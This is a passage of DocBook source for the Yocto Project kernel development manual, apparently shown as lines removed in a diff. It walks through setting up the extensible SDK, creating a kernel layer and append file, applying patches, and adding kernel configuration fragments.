- <emphasis>Initialize the BitBake Environment:</emphasis>
- Before building an extensible SDK, you need to
- initialize the BitBake build environment by sourcing the
- build environment script
- (i.e. <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>):
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ source oe-init-build-env
- </literallayout>
- <note>
- The previous commands assume the
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- (i.e. <filename>poky</filename>) have been cloned
- using Git and the local repository is named
- "poky".
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Prepare Your <filename>local.conf</filename> File:</emphasis>
- By default, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable is set to "qemux86-64", which is fine if you are
- building for the QEMU emulator in 64-bit mode.
- However, if you are not, you need to set the
- <filename>MACHINE</filename> variable appropriately in
- your <filename>conf/local.conf</filename> file found in
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- (i.e. <filename>~/poky/build</filename> in this
- example).</para>
-
- <para>Also, since you are preparing to work on the
- kernel image, you need to set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
- variable to include kernel modules.</para>
-
- <para>In this example we wish to build for qemux86 so
- we must set the <filename>MACHINE</filename> variable
- to "qemux86" and also add the "kernel-modules". As described
- we do this by appending to <filename>conf/local.conf</filename>:
- <literallayout class='monospaced'>
- MACHINE = "qemux86"
- MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Layer for Patches:</emphasis>
- You need to create a layer to hold patches created
- for the kernel image.
- You can use the
- <filename>bitbake-layers create-layer</filename>
- command as follows:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake-layers create-layer ../../meta-mylayer
- NOTE: Starting bitbake server...
- Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
- $
- </literallayout>
- <note>
- For background information on working with
- common and BSP layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks
- Manual and the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
- section in the Yocto Project Board Support (BSP)
- Developer's Guide, respectively.
- For information on how to use the
- <filename>bitbake-layers create-layer</filename>
- command to quickly set up a layer, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Development Tasks
- Manual.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Inform the BitBake Build Environment About
- Your Layer:</emphasis>
- As directed when you created your layer, you need to
- add the layer to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
- variable in the <filename>bblayers.conf</filename> file
- as follows:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake-layers add-layer ../../meta-mylayer
- NOTE: Starting bitbake server...
- $
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Extensible SDK:</emphasis>
- Use BitBake to build the extensible SDK specifically
- for use with images to be run using QEMU:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake core-image-minimal -c populate_sdk_ext
- </literallayout>
- Once the build finishes, you can find the SDK installer
- file (i.e. <filename>*.sh</filename> file) in the
- following directory:
- <literallayout class='monospaced'>
- ~/poky/build/tmp/deploy/sdk
- </literallayout>
- For this example, the installer file is named
- <filename>poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-&DISTRO;.sh</filename>
- </para></listitem>
- <listitem><para>
- <emphasis>Install the Extensible SDK:</emphasis>
- Use the following command to install the SDK.
- For this example, install the SDK in the default
- <filename>~/poky_sdk</filename> directory:
- <literallayout class='monospaced'>
- $ cd ~/poky/build/tmp/deploy/sdk
- $ ./poky-glibc-x86_64-core-image-minimal-i586-toolchain-ext-&DISTRO;.sh
- Poky (Yocto Project Reference Distro) Extensible SDK installer version &DISTRO;
- ============================================================================
- Enter target directory for SDK (default: ~/poky_sdk):
- You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
- Extracting SDK......................................done
- Setting it up...
- Extracting buildtools...
- Preparing build system...
- Parsing recipes: 100% |#################################################################| Time: 0:00:52
- Initializing tasks: 100% |############## ###############################################| Time: 0:00:04
- Checking sstate mirror object availability: 100% |######################################| Time: 0:00:00
- Parsing recipes: 100% |#################################################################| Time: 0:00:33
- Initializing tasks: 100% |##############################################################| Time: 0:00:00
- done
- SDK has been successfully set up and is ready to be used.
- Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
- $ . /home/scottrif/poky_sdk/environment-setup-i586-poky-linux
- </literallayout>
- </para></listitem>
- <listitem><para id='setting-up-the-esdk-terminal'>
- <emphasis>Set Up a New Terminal to Work With the
- Extensible SDK:</emphasis>
- You must set up a new terminal to work with the SDK.
- You cannot use the same BitBake shell used to build the
- installer.</para>
-
- <para>After opening a new shell, run the SDK environment
- setup script as directed by the output from installing
- the SDK:
- <literallayout class='monospaced'>
- $ source ~/poky_sdk/environment-setup-i586-poky-linux
- "SDK environment now set up; additionally you may now run devtool to perform development tasks.
- Run devtool --help for further details.
- </literallayout>
- <note>
- If you get a warning about attempting to use the
- extensible SDK in an environment set up to run
- BitBake, you did not use a new shell.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Clean Image:</emphasis>
- The final step in preparing to work on the kernel is to
- build an initial image using
- <filename>devtool</filename> in the new terminal you
- just set up and initialized for SDK work:
- <literallayout class='monospaced'>
- $ devtool build-image
- Parsing recipes: 100% |##########################################| Time: 0:00:05
- Parsing of 830 .bb files complete (0 cached, 830 parsed). 1299 targets, 47 skipped, 0 masked, 0 errors.
- WARNING: No packages to add, building image core-image-minimal unmodified
- Loading cache: 100% |############################################| Time: 0:00:00
- Loaded 1299 entries from dependency cache.
- NOTE: Resolving any missing task queue dependencies
- Initializing tasks: 100% |#######################################| Time: 0:00:07
- Checking sstate mirror object availability: 100% |###############| Time: 0:00:00
- NOTE: Executing SetScene Tasks
- NOTE: Executing RunQueue Tasks
- NOTE: Tasks Summary: Attempted 2866 tasks of which 2604 didn't need to be rerun and all succeeded.
- NOTE: Successfully built core-image-minimal. You can find output files in /home/scottrif/poky_sdk/tmp/deploy/images/qemux86
- </literallayout>
- If you were building for actual hardware and not for
- emulation, you could flash the image to a USB stick
- on <filename>/dev/sdd</filename> and boot your device.
- For an example that uses a Minnowboard, see the
- <ulink url='https://wiki.yoctoproject.org/wiki/TipsAndTricks/KernelDevelopmentWithEsdk'>TipsAndTricks/KernelDevelopmentWithEsdk</ulink>
- Wiki page.
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- At this point you have set up to start making modifications to
- the kernel by using the extensible SDK.
- For a continued example, see the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- section.
- </para>
- </section>
-
- <section id='getting-ready-for-traditional-kernel-development'>
- <title>Getting Ready for Traditional Kernel Development</title>
-
- <para>
- Getting ready for traditional kernel development using the Yocto
- Project involves many of the same steps as described in the
- previous section.
- However, you need to establish a local copy of the kernel source
- since you will be editing these files.
- </para>
-
- <para>
- Follow these steps to prepare to update the kernel image using
- traditional kernel development flow with the Yocto Project.
- Completing this procedure leaves you ready to make modifications
- to the kernel source as described in the
- "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
- section:
- <orderedlist>
- <listitem><para>
- <emphasis>Initialize the BitBake Environment:</emphasis>
- Before you can do anything using BitBake, you need to
- initialize the BitBake build environment by sourcing the
- build environment script
- (i.e. <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>oe-init-build-env</filename></ulink>).
- Also, for this example, be sure that the local branch
- you have checked out for <filename>poky</filename> is
- the Yocto Project &DISTRO_NAME; branch.
- If you need to checkout out the &DISTRO_NAME; branch,
- see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking out by Branch in Poky</ulink>"
- section in the Yocto Project Development Tasks Manual.
- <literallayout class='monospaced'>
- $ cd ~/poky
- $ git branch
- master
- * &DISTRO_NAME;
- $ source oe-init-build-env
- </literallayout>
- <note>
- The previous commands assume the
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
- (i.e. <filename>poky</filename>) have been cloned
- using Git and the local repository is named
- "poky".
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Prepare Your <filename>local.conf</filename>
- File:</emphasis>
- By default, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable is set to "qemux86-64", which is fine if you are
- building for the QEMU emulator in 64-bit mode.
- However, if you are not, you need to set the
- <filename>MACHINE</filename> variable appropriately in
- your <filename>conf/local.conf</filename> file found
- in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- (i.e. <filename>~/poky/build</filename> in this
- example).</para>
-
- <para>Also, since you are preparing to work on the
- kernel image, you need to set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
- variable to include kernel modules.</para>
-
- <para>In this example we wish to build for qemux86 so
- we must set the <filename>MACHINE</filename> variable
- to "qemux86" and also add the "kernel-modules". As described
- we do this by appending to <filename>conf/local.conf</filename>:
- <literallayout class='monospaced'>
- MACHINE = "qemux86"
- MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-modules"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Layer for Patches:</emphasis>
- You need to create a layer to hold patches created
- for the kernel image.
- You can use the
- <filename>bitbake-layers create-layer</filename>
- command as follows:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake-layers create-layer ../../meta-mylayer
- NOTE: Starting bitbake server...
- Add your new layer with 'bitbake-layers add-layer ../../meta-mylayer'
- </literallayout>
- <note>
- For background information on working with
- common and BSP layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks
- Manual and the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP Layers</ulink>"
- section in the Yocto Project Board Support (BSP)
- Developer's Guide, respectively.
- For information on how to use the
- <filename>bitbake-layers create-layer</filename>
- command to quickly set up a layer, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Development Tasks
- Manual.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Inform the BitBake Build Environment About
- Your Layer:</emphasis>
- As directed when you created your layer, you need to add
- the layer to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBLAYERS'><filename>BBLAYERS</filename></ulink>
- variable in the <filename>bblayers.conf</filename> file
- as follows:
- <literallayout class='monospaced'>
- $ cd ~/poky/build
- $ bitbake-layers add-layer ../../meta-mylayer
- NOTE: Starting bitbake server ...
- $
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Local Copy of the Kernel Git
- Repository:</emphasis>
- You can find Git repositories of supported Yocto Project
- kernels organized under "Yocto Linux Kernel" in the
- Yocto Project Source Repositories at
- <ulink url='&YOCTO_GIT_URL;'></ulink>.
- </para>
-
- <para>
- For simplicity, it is recommended that you create your
- copy of the kernel Git repository outside of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>,
- which is usually named <filename>poky</filename>.
- Also, be sure you are in the
- <filename>standard/base</filename> branch.
- </para>
-
- <para>
- The following commands show how to create a local copy
- of the <filename>linux-yocto-4.12</filename> kernel and
- be in the <filename>standard/base</filename> branch.
- <note>
- The <filename>linux-yocto-4.12</filename> kernel
- can be used with the Yocto Project 2.4 release
- and forward.
- You cannot use the
- <filename>linux-yocto-4.12</filename> kernel with
- releases prior to Yocto Project 2.4:
- </note>
- <literallayout class='monospaced'>
- $ cd ~
- $ git clone git://git.yoctoproject.org/linux-yocto-4.12 --branch standard/base
- Cloning into 'linux-yocto-4.12'...
- remote: Counting objects: 6097195, done.
- remote: Compressing objects: 100% (901026/901026), done.
- remote: Total 6097195 (delta 5152604), reused 6096847 (delta 5152256)
- Receiving objects: 100% (6097195/6097195), 1.24 GiB | 7.81 MiB/s, done.
- Resolving deltas: 100% (5152604/5152604), done.
- Checking connectivity... done.
- Checking out files: 100% (59846/59846), done.
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Create a Local Copy of the Kernel Cache Git
- Repository:</emphasis>
- For simplicity, it is recommended that you create your
- copy of the kernel cache Git repository outside of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>,
- which is usually named <filename>poky</filename>.
- Also, for this example, be sure you are in the
- <filename>yocto-4.12</filename> branch.
- </para>
-
- <para>
- The following commands show how to create a local copy
- of the <filename>yocto-kernel-cache</filename> and
- be in the <filename>yocto-4.12</filename> branch:
- <literallayout class='monospaced'>
- $ cd ~
- $ git clone git://git.yoctoproject.org/yocto-kernel-cache --branch yocto-4.12
- Cloning into 'yocto-kernel-cache'...
- remote: Counting objects: 22639, done.
- remote: Compressing objects: 100% (9761/9761), done.
- remote: Total 22639 (delta 12400), reused 22586 (delta 12347)
- Receiving objects: 100% (22639/22639), 22.34 MiB | 6.27 MiB/s, done.
- Resolving deltas: 100% (12400/12400), done.
- Checking connectivity... done.
- </literallayout>
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- At this point, you are ready to start making modifications to
- the kernel using traditional kernel development steps.
- For a continued example, see the
- "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
- section.
- </para>
- </section>
- </section>
-
- <section id='creating-and-preparing-a-layer'>
- <title>Creating and Preparing a Layer</title>
-
- <para>
- If you are going to be modifying kernel recipes, it is recommended
- that you create and prepare your own layer in which to do your
- work.
- Your layer contains its own
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- append files (<filename>.bbappend</filename>) and provides a
- convenient mechanism to create your own recipe files
- (<filename>.bb</filename>) as well as store and use kernel
- patch files.
- For background information on working with layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks Manual.
- <note><title>Tip</title>
- The Yocto Project comes with many tools that simplify
- tasks you need to perform.
- One such tool is the
- <filename>bitbake-layers create-layer</filename>
- command, which simplifies creating a new layer.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
- section in the Yocto Project Development Tasks Manual for
- information on how to use this script to quick set up a
- new layer.
- </note>
- </para>
-
- <para>
- To better understand the layer you create for kernel development,
- the following section describes how to create a layer
- without the aid of tools.
- These steps assume creation of a layer named
- <filename>mylayer</filename> in your home directory:
- <orderedlist>
- <listitem><para>
- <emphasis>Create Structure</emphasis>:
- Create the layer's structure:
- <literallayout class='monospaced'>
- $ cd $HOME
- $ mkdir meta-mylayer
- $ mkdir meta-mylayer/conf
- $ mkdir meta-mylayer/recipes-kernel
- $ mkdir meta-mylayer/recipes-kernel/linux
- $ mkdir meta-mylayer/recipes-kernel/linux/linux-yocto
- </literallayout>
- The <filename>conf</filename> directory holds your
- configuration files, while the
- <filename>recipes-kernel</filename> directory holds your
- append file and eventual patch files.
- </para></listitem>
- <listitem><para>
- <emphasis>Create the Layer Configuration File</emphasis>:
- Move to the <filename>meta-mylayer/conf</filename>
- directory and create the <filename>layer.conf</filename>
- file as follows:
- <literallayout class='monospaced'>
- # We have a conf and classes directory, add to BBPATH
- BBPATH .= ":${LAYERDIR}"
-
- # We have recipes-* directories, add to BBFILES
- BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
- ${LAYERDIR}/recipes-*/*/*.bbappend"
-
- BBFILE_COLLECTIONS += "mylayer"
- BBFILE_PATTERN_mylayer = "^${LAYERDIR}/"
- BBFILE_PRIORITY_mylayer = "5"
- </literallayout>
- Notice <filename>mylayer</filename> as part of the last
- three statements.
- </para></listitem>
- <listitem><para>
- <emphasis>Create the Kernel Recipe Append File</emphasis>:
- Move to the
- <filename>meta-mylayer/recipes-kernel/linux</filename>
- directory and create the kernel's append file.
- This example uses the
- <filename>linux-yocto-4.12</filename> kernel.
- Thus, the name of the append file is
- <filename>linux-yocto_4.12.bbappend</filename>:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
-
- SRC_URI_append = " file://<replaceable>patch-file-one</replaceable>"
- SRC_URI_append = " file://<replaceable>patch-file-two</replaceable>"
- SRC_URI_append = " file://<replaceable>patch-file-three</replaceable>"
- </literallayout>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statements enable the OpenEmbedded build system to find
- patch files.
- For more information on using append files, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
-
- <section id='modifying-an-existing-recipe'>
- <title>Modifying an Existing Recipe</title>
-
- <para>
- In many cases, you can customize an existing linux-yocto recipe to
- meet the needs of your project.
- Each release of the Yocto Project provides a few Linux
- kernel recipes from which you can choose.
- These are located in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- in <filename>meta/recipes-kernel/linux</filename>.
- </para>
-
- <para>
- Modifying an existing recipe can consist of the following:
- <itemizedlist>
- <listitem><para>Creating the append file</para></listitem>
- <listitem><para>Applying patches</para></listitem>
- <listitem><para>Changing the configuration</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Before modifying an existing recipe, be sure that you have created
- a minimal, custom layer from which you can work.
- See the
- "<link linkend='creating-and-preparing-a-layer'>Creating and Preparing a Layer</link>"
- section for information.
- </para>
-
- <section id='creating-the-append-file'>
- <title>Creating the Append File</title>
-
- <para>
- You create this file in your custom layer.
- You also name it accordingly based on the linux-yocto recipe
- you are using.
- For example, if you are modifying the
- <filename>meta/recipes-kernel/linux/linux-yocto_4.12.bb</filename>
- recipe, the append file will typically be located as follows
- within your custom layer:
- <literallayout class='monospaced'>
- <replaceable>your-layer</replaceable>/recipes-kernel/linux/linux-yocto_4.12.bbappend
- </literallayout>
- The append file should initially extend the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- search path by prepending the directory that contains your
- files to the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- variable as follows:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
- </literallayout>
- The path <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-THISDIR'><filename>THISDIR</filename></ulink><filename>}/${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink><filename>}</filename>
- expands to "linux-yocto" in the current directory for this
- example.
- If you add any new files that modify the kernel recipe and you
- have extended <filename>FILESPATH</filename> as
- described above, you must place the files in your layer in the
- following area:
- <literallayout class='monospaced'>
- <replaceable>your-layer</replaceable>/recipes-kernel/linux/linux-yocto/
- </literallayout>
- <note>If you are working on a new machine Board Support Package
- (BSP), be sure to refer to the
- <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
- </note>
- </para>
-
- <para>
- As an example, consider the following append file
- used by the BSPs in <filename>meta-yocto-bsp</filename>:
- <literallayout class='monospaced'>
- meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend
- </literallayout>
- The following listing shows the file.
- Be aware that the actual commit ID strings in this
- example listing might be different than the actual strings
- in the file from the <filename>meta-yocto-bsp</filename>
- layer upstream.
- <literallayout class='monospaced'>
- KBRANCH_genericx86 = "standard/base"
- KBRANCH_genericx86-64 = "standard/base"
-
- KMACHINE_genericx86 ?= "common-pc"
- KMACHINE_genericx86-64 ?= "common-pc-64"
- KBRANCH_edgerouter = "standard/edgerouter"
- KBRANCH_beaglebone = "standard/beaglebone"
-
- SRCREV_machine_genericx86 ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
- SRCREV_machine_genericx86-64 ?= "d09f2ce584d60ecb7890550c22a80c48b83c2e19"
- SRCREV_machine_edgerouter ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
- SRCREV_machine_beaglebone ?= "b5c8cfda2dfe296410d51e131289fb09c69e1e7d"
-
-
- COMPATIBLE_MACHINE_genericx86 = "genericx86"
- COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
- COMPATIBLE_MACHINE_edgerouter = "edgerouter"
- COMPATIBLE_MACHINE_beaglebone = "beaglebone"
-
- LINUX_VERSION_genericx86 = "4.12.7"
- LINUX_VERSION_genericx86-64 = "4.12.7"
- LINUX_VERSION_edgerouter = "4.12.10"
- LINUX_VERSION_beaglebone = "4.12.10"
- </literallayout>
- This append file contains statements used to support
- several BSPs that ship with the Yocto Project.
- The file defines machines using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></ulink>
- variable and uses the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>
- variable to ensure the machine name used by the OpenEmbedded
- build system maps to the machine name used by the Linux Yocto
- kernel.
- The file also uses the optional
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>
- variable to ensure the build process uses the
- appropriate kernel branch.
- </para>
-
- <para>
- Although this particular example does not use it, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
- variable could be used to enable features specific to
- the kernel.
- The append file points to specific commits in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- Git repository and the <filename>meta</filename> Git repository
- branches to identify the exact kernel needed to build the
- BSP.
- </para>
-
- <para>
- One thing missing in this particular BSP, which you will
- typically need when developing a BSP, is the kernel
- configuration file (<filename>.config</filename>) for your BSP.
- When developing a BSP, you probably have a kernel configuration
- file or a set of kernel configuration files that, when taken
- together, define the kernel configuration for your BSP.
- You can accomplish this definition by putting the configurations
- in a file or a set of files inside a directory located at the
- same level as your kernel's append file and having the same
- name as the kernel's main recipe file.
- With all these conditions met, simply reference those files in
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statement in the append file.
- </para>
-
- <para>
- For example, suppose you had some configuration options
- in a file called <filename>network_configs.cfg</filename>.
- You can place that file inside a directory named
- <filename>linux-yocto</filename> and then add
- a <filename>SRC_URI</filename> statement such as the
- following to the append file.
- When the OpenEmbedded build system builds the kernel, the
- configuration options are picked up and applied.
- <literallayout class='monospaced'>
- SRC_URI += "file://network_configs.cfg"
- </literallayout>
- </para>
-
- <para>
- To group related configurations into multiple files, you
- perform a similar procedure.
- Here is an example that groups separate configurations
- specifically for Ethernet and graphics into their own
- files and adds the configurations by using a
- <filename>SRC_URI</filename> statement like the following
- in your append file:
- <literallayout class='monospaced'>
- SRC_URI += "file://myconfig.cfg \
- file://eth.cfg \
- file://gfx.cfg"
- </literallayout>
- </para>
-
- <para>
- Another variable you can use in your kernel recipe append
- file is the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- variable.
- When you use this statement, you are extending the locations
- used by the OpenEmbedded system to look for files and
- patches as the recipe is processed.
- </para>
-
- <note>
- <para>
- Other methods exist to accomplish grouping and defining
- configuration options.
- For example, if you are working with a local clone of the
- kernel repository, you could checkout the kernel's
- <filename>meta</filename> branch, make your changes, and
- then push the changes to the local bare clone of the
- kernel.
- The result is that you directly add configuration options
- to the <filename>meta</filename> branch for your BSP.
- The configuration options will likely end up in that
- location anyway if the BSP gets added to the Yocto Project.
- </para>
-
- <para>
- In general, however, the Yocto Project maintainers take
- care of moving the <filename>SRC_URI</filename>-specified
- configuration options to the kernel's
- <filename>meta</filename> branch.
- Not only is it easier for BSP developers to not have to
- worry about putting those configurations in the branch,
- but having the maintainers do it allows them to apply
- 'global' knowledge about the kinds of common configuration
- options multiple BSPs in the tree are typically using.
- This allows for promotion of common configurations into
- common features.
- </para>
- </note>
- </section>
-
- <section id='applying-patches'>
- <title>Applying Patches</title>
-
- <para>
- If you have a single patch or a small series of patches
- that you want to apply to the Linux kernel source, you
- can do so just as you would with any other recipe.
- You first copy the patches to the path added to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- in your <filename>.bbappend</filename> file as described in
- the previous section, and then reference them in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- statements.
- </para>
-
- <para>
- For example, you can apply a three-patch series by adding the
- following lines to your linux-yocto
- <filename>.bbappend</filename> file in your layer:
- <literallayout class='monospaced'>
- SRC_URI += "file://0001-first-change.patch"
- SRC_URI += "file://0002-second-change.patch"
- SRC_URI += "file://0003-third-change.patch"
- </literallayout>
- The next time you run BitBake to build the Linux kernel,
- BitBake detects the change in the recipe and fetches and
- applies the patches before building the kernel.
- </para>
-
- <para>
- For a detailed example showing how to patch the kernel using
- <filename>devtool</filename>, see the
- "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
- and
- "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
- sections.
- </para>
- </section>
-
- <section id='changing-the-configuration'>
- <title>Changing the Configuration</title>
-
- <para>
- You can make wholesale or incremental changes to the final
- <filename>.config</filename> file used for the eventual
- Linux kernel configuration by including a
- <filename>defconfig</filename> file and by specifying
- configuration fragments in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- to be applied to that file.
- </para>
-
- <para>
- If you have a complete, working Linux kernel
- <filename>.config</filename>
- file you want to use for the configuration, as before, copy
- that file to the appropriate <filename>${PN}</filename>
- directory in your layer's
- <filename>recipes-kernel/linux</filename> directory,
- and rename the copied file to "defconfig".
- Then, add the following lines to the linux-yocto
- <filename>.bbappend</filename> file in your layer:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
- SRC_URI += "file://defconfig"
- </literallayout>
- The <filename>SRC_URI</filename> tells the build system how to
- search for the file, while the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
- extends the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
- variable (search directories) to include the
- <filename>${PN}</filename> directory you created to hold the
- configuration changes.
- </para>
-
- <note>
- The build system applies the configurations from the
- <filename>defconfig</filename> file before applying any
- subsequent configuration fragments.
- The final kernel configuration is a combination of the
- configurations in the <filename>defconfig</filename> file and
- any configuration fragments you provide.
- You need to realize that if you have any configuration
- fragments, the build system applies these on top of and
- after applying the existing <filename>defconfig</filename>
- file configurations.
- </note>
-
- <para>
- Generally speaking, the preferred approach is to determine the
- incremental change you want to make and add that as a
- configuration fragment.
- For example, if you want to add support for a basic serial
- console, create a file named <filename>8250.cfg</filename> in
- the <filename>${PN}</filename> directory with the following
- content (without indentation):
- <literallayout class='monospaced'>
- CONFIG_SERIAL_8250=y
- CONFIG_SERIAL_8250_CONSOLE=y
- CONFIG_SERIAL_8250_PCI=y
- CONFIG_SERIAL_8250_NR_UARTS=4
- CONFIG_SERIAL_8250_RUNTIME_UARTS=4
- CONFIG_SERIAL_CORE=y
- CONFIG_SERIAL_CORE_CONSOLE=y
- </literallayout>
- Next, include this configuration fragment and extend the
- <filename>FILESPATH</filename> variable in your
- <filename>.bbappend</filename> file:
- <literallayout class='monospaced'>
- FILESEXTRAPATHS_prepend := "${THISDIR}/${PN}:"
- SRC_URI += "file://8250.cfg"
- </literallayout>
- The next time you run BitBake to build the Linux kernel, BitBake
- detects the change in the recipe and fetches and applies the
- new configuration before building the kernel.
- </para>
-
- <para>
- For a detailed example showing how to configure the kernel,
- see the
- "<link linkend='configuring-the-kernel'>Configuring the Kernel</link>"
- section.
- </para>
- </section>
-
- <section id='using-an-in-tree-defconfig-file'>
- <title>Using an "In-Tree"&nbsp;&nbsp;<filename>defconfig</filename> File</title>
-
- <para>
- It might be desirable to have kernel configuration fragment
- support through a <filename>defconfig</filename> file that
- is pulled from the kernel source tree for the configured
- machine.
